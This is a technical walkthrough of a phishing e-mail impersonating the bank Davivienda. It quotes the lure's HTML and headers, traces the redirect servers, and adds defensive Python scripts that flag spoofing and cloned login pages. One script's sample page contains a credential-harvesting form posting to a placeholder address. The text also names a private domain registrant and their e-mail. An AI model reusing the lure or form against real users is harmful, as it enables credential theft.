Technical analysis of phishing.

What is phishing? 

 

Phishing is a way of attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,[1] and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,[2] and exploits the poor usability of current web security technologies.[3] Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

 

Source ( http://en.wikipedia.org/wiki/Phishing )

Today we look at an e-mail received by several of our customers, who shared it with us to analyse and publish.

Although Hotmail's anti-phishing checks flag the message, it is still delivered to the user's inbox, where an inexperienced user could fall into the trap.

After choosing the "Show content" option, we went through the message point by point to see how these fraudulent e-mails operate and how they harvest private information from unsuspecting users while neither the local authorities in the affected countries nor the global Internet bodies intervene.

Reviewing the message source (using the option shown in the image below) confirms that the e-mail loads an image hosted on a compromised web server; the only text in the body ("Para visualizar correctamente este correo haga clic en mostrar imagenes", i.e. "To display this e-mail correctly, click Show images") is there to get the recipient to load that image.

 

Subject: Davivienda S.A
From: Cuenta Bloqueada<Davivienda@eltiempo.com>
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Priority: 1 (Higuest)
X-MSMail-Priority: High
Importance: normal
Reply-To: Davivienda@eltiempo.com
Return-Path: ceetusr@eltiempo.com
X-OriginalArrivalTime: 15 May 2012 04:14:11.0812 (UTC) FILETIME=[2E899240:01CD3251]

<html>
<body>
<center>
  <p>Para visualizar correctamente este correo haga clic en mostrar imagenes</p>
  <p><img src="http://www.grodcoconcesiones.com.co/imagenesadministrador/Mensaje.jpg" border="0" usemap="#Map">
    <map name="Map" id="Map">
      <area shape="rect" coords="228,698,400,779" href="http://222.128.6.141/index.html" />
      <area shape="rect" coords="322,831,357,859" href="http://222.128.6.141/index.html" />
    </map>
  </p>
</center>
</body>
</html>

 

The authentication headers added by Hotmail also show where the message really came from: it was relayed by ceetmail.eltiempo.com (200.41.9.251), not by Davivienda, Sender ID returned a soft fail for the From: address and the message carries no DKIM signature:

x-store-info:sbevkl2QZR7OXo7WID5ZcVBK1Phj2jX/
Authentication-Results: hotmail.com; sender-id=softfail (sender IP is 200.41.9.251) header.from=Davivienda@eltiempo.com; dkim=none header.d=eltiempo.com; x-hmca=fail
X-SID-PRA: Davivienda@eltiempo.com
X-SID-Result: SoftFail
X-DKIM-Result: None
X-Message-Status: s1:0:n
X-AUTH-Result: FAIL
X-Message-Delivery: Vj0xLjE7dXM9MDtsPTA7YT0wO0Q9MTtHRD0xO1NDTD0y
X-Message-Info: NhFq/7gR1vQ8HYpTTD73yxNCczFurQ1xl5Wx1KDl5JdU2JZGGu+QKweE0n5pwLQ/EIUKpwAu87lyM/lusPyIJz2M1M9CeHlEJnQUVL1eBoo8c9ZJf80WTvFkpc9rzLFIGQ59pkq1EvzsjpijgUOYPw==
Received: from ceetmail.eltiempo.com ([200.41.9.251]) by SNT0-MC2-F44.Snt0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900);

The image is hosted on the web server of the ZMB road concession in Bucaramanga, Colombia (www.grodcoconcesiones.com.co); the administrator of that site is probably unaware that the server has been compromised and is being used to serve the lure.

An HTML image map makes the downloaded image clickable; both clickable regions point to the same page on a web server whose address is located in China:

<map name="Map" id="Map">
  <area shape="rect" coords="228,698,400,779" href="http://222.128.6.141/index.html" />
  <area shape="rect" coords="322,831,357,859" href="http://222.128.6.141/index.html" />
</map>
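The checks above (a From: domain that does not match the impersonated brand, Sender ID soft fail with no DKIM, an image pulled from a third-party host, and links whose target is a bare IP address) can be scripted. The following is an added example written for this article, not code from the original analysis: it reconstructs the message from the headers and body quoted above (the X-Message-* headers and the truncated Received: line are left out, since the checks do not use them) and triages it with the Python standard library only.

```python
# Added example (not from the original article): triage of the phishing
# e-mail quoted above. RAW_MESSAGE is reconstructed from the headers and
# HTML body shown on the page; only standard-library modules are used.
import email
from email.utils import parseaddr
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlsplit

BRAND = "davivienda"  # the brand the message impersonates

RAW_MESSAGE = """\
Subject: Davivienda S.A
From: Cuenta Bloqueada<Davivienda@eltiempo.com>
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
X-Priority: 1 (Higuest)
X-MSMail-Priority: High
Importance: normal
Reply-To: Davivienda@eltiempo.com
Return-Path: ceetusr@eltiempo.com
Authentication-Results: hotmail.com; sender-id=softfail (sender IP is 200.41.9.251) header.from=Davivienda@eltiempo.com; dkim=none header.d=eltiempo.com; x-hmca=fail
X-SID-Result: SoftFail
X-DKIM-Result: None
X-AUTH-Result: FAIL

<html><body><center>
<p>Para visualizar correctamente este correo haga clic en mostrar imagenes</p>
<p><img src="http://www.grodcoconcesiones.com.co/imagenesadministrador/Mensaje.jpg" border="0" usemap="#Map">
<map name="Map" id="Map">
<area shape="rect" coords="228,698,400,779" href="http://222.128.6.141/index.html" />
<area shape="rect" coords="322,831,357,859" href="http://222.128.6.141/index.html" />
</map></p>
</center></body></html>
"""


class LinkCollector(HTMLParser):
    """Collects every image source and every clickable target in an HTML body."""

    def __init__(self):
        super().__init__()
        self.srcs, self.hrefs = [], []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img" and a.get("src"):
            self.srcs.append(a["src"])
        elif tag in ("a", "area") and a.get("href"):  # <area .../> also lands here
            self.hrefs.append(a["href"])


def parse_auth_results(header):
    """Turn 'authserv-id; method=result (comment) prop=val; ...' into {method: result}."""
    results = {}
    for clause in header.split(";")[1:]:  # clause 0 is the authserv-id (hotmail.com)
        method, _, rest = clause.strip().partition("=")
        if rest:
            results[method.strip()] = rest.split()[0].lower()
    return results


def _hosts(urls):
    return sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})


def triage(raw):
    msg = email.message_from_string(raw)
    display, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    auth = parse_auth_results(msg.get("Authentication-Results", ""))

    links = LinkCollector()
    links.feed(msg.get_payload())  # single-part text/html body
    image_hosts, link_hosts = _hosts(links.srcs), _hosts(links.hrefs)

    findings = []
    # 1. Brand named in the subject or display name, but the sender domain is someone else's.
    if BRAND in (msg.get("Subject", "") + display).lower() and BRAND not in from_domain:
        findings.append(f"claims to be {BRAND} but From: domain is {from_domain}")
    # 2. The receiving MTA's own verdicts: anything other than 'pass' is worth a look.
    for method, result in auth.items():
        if result != "pass":
            findings.append(f"{method}={result}")
    # 3. Clickable targets that are bare IP addresses (no domain name at all).
    for host in link_hosts:
        try:
            ip_address(host)
            findings.append(f"link target is a bare IP address: {host}")
        except ValueError:
            pass
    # 4. Images and links served from hosts unrelated to the sender's domain.
    for host in image_hosts + link_hosts:
        if not host.endswith(from_domain):
            findings.append(f"content loaded from third-party host: {host}")

    return {"from_domain": from_domain, "auth": auth,
            "image_hosts": image_hosts, "link_hosts": link_hosts,
            "findings": findings}


if __name__ == "__main__":
    for line in triage(RAW_MESSAGE)["findings"]:
        print("-", line)
```

Run on the reconstructed message it reports seven findings: the brand mismatch, the three non-passing authentication results (sender-id=softfail, dkim=none, x-hmca=fail), the bare-IP link target, and the two third-party hosts (the compromised image host and the Chinese server). Any one of these is a reason to quarantine; together they leave little doubt.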

TraceRoute to 222.128.6.141

Hop  RTT1(ms)   RTT2(ms)   RTT3(ms)   IP address        Host name
1    20         0          0          8.9.232.73        xe-5-3-0.edge3.dallas1.level3.net
2    1          1          1          4.69.145.76       ae-2-70.edge2.dallas3.level3.net
3    5          4          4          144.232.24.17     sl-st30-dal-.sprintlink.net
4    5          5          4          144.232.25.189    -
5    4          4          4          144.232.1.44      sl-crs1-fw-0-7-0-0.sprintlink.net
6    40         42         41         144.232.25.159    sl-crs1-ria-0-4-2-0.sprintlink.net
7    41         41         41         144.232.25.156    sl-crs1-ana-0-10-0-0.sprintlink.net
8    40         40         40         144.232.0.37      sl-gw29-ana-0-0-0.sprintlink.net
9    507        512        515        160.81.147.166    sl-china6-1-0.sprintlink.net
10   517        519        510        219.158.97.9      -
11   543        541        533        219.158.11.17     -
12   611        Timed out  610        219.158.4.157     -
13   598        576        574        123.126.0.74      -
14   596        584        590        124.65.56.154     -
15   Timed out  611        616        61.148.163.222    -
16   604        Timed out  580        222.128.6.141     -

Trace complete

When index.html on 222.128.6.141 loads, it in turn pulls in the actual phishing page, which is hosted on the server that serves mix58fm.com, located in the U.S. and registered to Rhode Alexander (lights1@adelphia.net).

 

 

The site looks exactly like the real http://www.davivienda.com. The copy was made with the site-mirroring tool HTTrack Website Copier 3 (http://www.httrack.com), which leaves a "Mirrored from ... by HTTrack Website Copier/3.x" comment at the top of every page it saves.

Credentials typed into the cloned site are captured, after which the page tries to close the browser window so the victim does not notice that nothing has happened.
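The three tell-tales of such a clone described above (the HTTrack mirror comment, a login form that posts somewhere other than the bank, and a script that closes the window) can be checked mechanically once the page has been captured. The following is an added example written for this article, not code from the original analysis. SAMPLE_PAGE is a constructed stand-in for the cloned page, not the page the authors examined: the form action (203.0.113.7, an RFC 5737 documentation address), the field names and the script are placeholders; only the HTTrack comment follows the format the tool actually writes.

```python
# Added example (not from the original article): inspects a captured landing
# page for the signs of a cloned bank site described above. SAMPLE_PAGE is a
# constructed stand-in, not the real phishing page; the form target, field
# names and script are placeholders. Standard library only.
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

LEGITIMATE_HOST = "www.davivienda.com"  # the site the clone pretends to be

# HTTrack writes this comment at the top of every mirrored HTML file.
HTTRACK_RE = re.compile(r"Mirrored from (\S+) by HTTrack Website Copier/(\S+)")

SAMPLE_PAGE = """\
<!-- Mirrored from www.davivienda.com/ by HTTrack Website Copier/3.x [XR&CO'2010], Tue, 15 May 2012 04:00:00 GMT -->
<html><head><title>Davivienda</title></head>
<body>
<form method="post" action="http://203.0.113.7/login.php">
  Usuario: <input type="text" name="usuario">
  Clave: <input type="password" name="clave">
  <input type="submit" value="Ingresar" onclick="enviar()">
</form>
<script>
  function enviar() { document.forms[0].submit(); window.close(); }
</script>
</body></html>
"""


class PageInspector(HTMLParser):
    """Pulls out the mirror comment, form targets, password fields and inline scripts."""

    def __init__(self):
        super().__init__()
        self.mirrored_from = None
        self.httrack_version = None
        self.form_actions = []
        self.password_fields = 0
        self.scripts = []
        self._in_script = False

    def handle_comment(self, data):
        m = HTTRACK_RE.search(data)
        if m:
            self.mirrored_from = m.group(1).rstrip("/")
            self.httrack_version = m.group(2)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # script bodies arrive here as raw text
            self.scripts.append(data)


def inspect(html, legitimate_host=LEGITIMATE_HOST):
    p = PageInspector()
    p.feed(html)
    p.close()

    form_hosts = [urlsplit(a).hostname for a in p.form_actions if urlsplit(a).hostname]
    findings = []
    if p.mirrored_from:
        findings.append(f"HTTrack mirror of {p.mirrored_from} (copier version {p.httrack_version})")
    for host in form_hosts:
        if host != legitimate_host:
            findings.append(f"form posts to {host}, not to {legitimate_host}")
    if p.password_fields:
        findings.append(f"{p.password_fields} password field(s) collected")
    if any(re.search(r"\b(window|self)\.close\s*\(", s) for s in p.scripts):
        findings.append("script closes the window after submission")

    return {"mirrored_from": p.mirrored_from, "form_hosts": form_hosts, "findings": findings}


if __name__ == "__main__":
    for line in inspect(SAMPLE_PAGE)["findings"]:
        print("-", line)
```

On a genuine bank page none of the four findings fire; on the constructed sample all four do. The form-target check is the most reliable of them: a mirrored login page has to send the credentials somewhere the attacker controls, and that destination is visible in the HTML no matter how faithful the rest of the copy is.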

It may seem highly unlikely that anyone would fall for a site like this, but it happens far more often than people believe.

Video: http://www.youtube.com/watch?v=7a7rwM4e6W4